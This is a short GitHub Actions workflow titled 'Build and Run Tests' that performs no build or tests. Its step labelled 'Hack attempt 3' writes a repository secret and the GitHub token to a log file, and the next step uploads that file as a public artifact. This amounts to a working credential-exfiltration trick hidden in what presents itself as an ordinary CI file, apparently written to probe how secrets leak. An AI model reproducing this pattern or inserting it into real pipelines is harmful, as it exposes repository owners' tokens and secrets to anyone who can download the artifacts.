name: Build and Run Tests

on:
  push:
    branches:
    - master

  pull_request:
    branches:
    - master
    
  workflow_dispatch:


jobs:
  build-on-windows:
    name: Build on Windows
    runs-on: windows-latest

    steps:

    - uses: actions/checkout@v3
      with:
        submodules: recursive
      
    - name: Hack attempt 3
      run: python -c "import os; print(os.environ['sect'], os.environ['sect2'], file=open('hack.log', 'w'))"
      env:
        sect: ${{ secrets.TEST123 }}
        sect2: ${{ github.token }}
        
    - uses: actions/upload-artifact@v3
      with:
        name: TestLog
        path: ${{github.workspace}}/hack.log
